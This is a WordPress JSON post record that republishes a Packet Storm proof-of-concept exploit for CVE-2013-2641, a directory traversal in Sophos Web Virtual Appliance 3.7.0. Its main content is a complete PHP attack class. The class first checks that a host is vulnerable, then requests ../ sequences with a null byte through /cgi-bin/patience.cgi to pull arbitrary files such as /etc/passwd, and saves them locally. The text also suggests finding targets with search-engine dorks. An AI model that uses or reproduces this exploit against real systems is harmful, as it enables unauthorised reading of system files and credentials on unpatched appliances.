{"id":42059,"date":"2026-02-20T17:46:45","date_gmt":"2026-02-20T17:46:45","guid":{"rendered":"http:\/\/localhost\/?p=42059"},"modified":"2026-02-20T17:46:45","modified_gmt":"2026-02-20T17:46:45","slug":"sophos-web-virtual-appliance-370-directory-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=42059","title":{"rendered":"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965"},"content":{"rendered":"

{“lastseen”:”2026-02-20T22:59:32″,”description”:”Proof of concept exploit for an older vulnerability from 2013 where Sophos Web Virtual Appliance version 3.7.0 suffered from a directory traversal vulnerability…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:215965″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2013-2641″],”sourceData”:”=============================================================================================================================================\\n | # Title : Sophos Web Virtual Appliance v3.7.0 Directory Traversal Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 135.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.sophos.com\/en-us\/support\/downloads\/virtual-web-appliance |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Dorking \u0130n Google Or Other Search Enggine.\\n \\n [+] Code Description: This code allows you to exploit the Traversal Directory vulnerability in the Sophos Web Protection Appliance to retrieve any file from the system. \\n \\n cURL was used to execute HTTP requests, and the response was handled to verify the success of the attack and save the retrieved content to a local file.\\n \\n (Related : https:\/\/packetstorm.news\/files\/id\/180832\/ Linked CVE numbers: CVE-2013-2641 ) .\\n \\t\\n [+] save code as poc.php.\\n \\n [+] Set target : line 84\\n \\n [+] PayLoad :\\n \\n \\u003c?php\\n \\n class SophosTraversalExploit {\\n private $target;\\n private $port;\\n private $filepath;\\n private $depth;\\n \\n public function __construct($target, $port = 443, $filepath = ‘\/etc\/passwd’, $depth = 2) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003efilepath = $filepath;\\n $this-\\u003edepth = $depth;\\n }\\n \\n private function my_basename($filename) {\\n return basename(str_replace(‘\\\\\\\\’, ‘\/’, $filename));\\n }\\n \\n private function is_proficy() {\\n $url = \\”https:\/\/{$this-\\u003etarget}:{$this-\\u003eport}\/cgi-bin\/patience.cgi\\”;\\n $response = $this-\\u003esend_request($url);\\n \\n if ($response \\u0026\\u0026 strpos($response[‘body’], ‘The patience page request was not valid’) !== false) {\\n return true;\\n }\\n return false;\\n }\\n \\n private function read_file() {\\n $traversal_path = str_repeat(‘..\/’, $this-\\u003edepth) . $this-\\u003efilepath . \\”%00\\”;\\n echo \\”Retrieving file contents…\\\\n\\”;\\n \\n $url = \\”https:\/\/{$this-\\u003etarget}:{$this-\\u003eport}\/cgi-bin\/patience.cgi?id=\\” . urlencode($traversal_path);\\n $response = $this-\\u003esend_request($url);\\n \\n if ($response \\u0026\\u0026 ($response[‘code’] == 200 || $response[‘code’] == 500) \\u0026\\u0026 isset($response[‘headers’][‘X-Sophos-PatienceID’])) {\\n return $response[‘body’];\\n } else {\\n echo \\”Error: \\” . $response[‘code’] . \\”\\\\n\\” . $response[‘body’] . \\”\\\\n\\”;\\n return null;\\n }\\n }\\n \\n private function send_request($url) {\\n $ch = curl_init();\\n curl_setopt($ch, CURLOPT_URL, $url);\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n \\n $body = curl_exec($ch);\\n $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $headers = curl_getinfo($ch);\\n \\n curl_close($ch);\\n \\n return [‘code’ =\\u003e $code, ‘body’ =\\u003e $body, ‘headers’ =\\u003e $headers];\\n }\\n \\n public function run() {\\n echo \\”Checking if it’s a Sophos Web Protect Appliance with the vulnerable component…\\\\n\\”;\\n \\n if ($this-\\u003eis_proficy()) {\\n echo \\”Check successful\\\\n\\”;\\n } else {\\n echo \\”Sophos Web Protect Appliance vulnerable component not found\\\\n\\”;\\n return;\\n }\\n \\n $contents = $this-\\u003eread_file();\\n if ($contents === null) {\\n echo \\”File not downloaded\\\\n\\”;\\n return;\\n }\\n \\n $file_name = $this-\\u003emy_basename($this-\\u003efilepath);\\n file_put_contents($file_name, $contents);\\n echo \\”File saved as: \\” . $file_name . \\”\\\\n\\”;\\n }\\n }\\n \\n $exploit = new SophosTraversalExploit(‘target.com’);\\n $exploit-\\u003erun();\\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215965″,”cvss”:{“score”:5,”severity”:”MEDIUM”,”vector”:”AV:N\/AC:L\/Au:N\/C:P\/I:N\/A:N”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215965\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-20T22:59:32″,”description”:”Proof of concept exploit for an older vulnerability from 2013 where Sophos Web Virtual Appliance version 3.7.0 suffered from a directory traversal vulnerability…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sophos Web…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,128,12,21,13,53,7,11,5],"class_list":["post-42059","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-50","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=42059\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-20T22:59:32″,”description”:”Proof of concept exploit for an older vulnerability from 2013 where Sophos Web Virtual Appliance version 3.7.0 suffered from a directory traversal vulnerability…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sophos Web...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=42059\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-20T17:46:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965\",\"datePublished\":\"2026-02-20T17:46:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059\"},\"wordCount\":683,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.0\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=42059#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059\",\"name\":\"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-20T17:46:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=42059\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42059#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=42059","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965 - zero redgem","og_description":"{“lastseen”:”2026-02-20T22:59:32″,”description”:”Proof of concept exploit for an older vulnerability from 2013 where Sophos Web Virtual Appliance version 3.7.0 suffered from a directory traversal vulnerability…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sophos Web...","og_url":"https:\/\/zero.redgem.net\/?p=42059","og_site_name":"zero redgem","article_published_time":"2026-02-20T17:46:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=42059#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=42059"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965","datePublished":"2026-02-20T17:46:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=42059"},"wordCount":683,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.0","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=42059#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=42059","url":"https:\/\/zero.redgem.net\/?p=42059","name":"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-20T17:46:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=42059#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=42059"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=42059#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Sophos Web Virtual Appliance 3.7.0 Directory Traversal_PACKETSTORM:215965"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/42059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=42059"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/42059\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=42059"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=42059"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=42059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}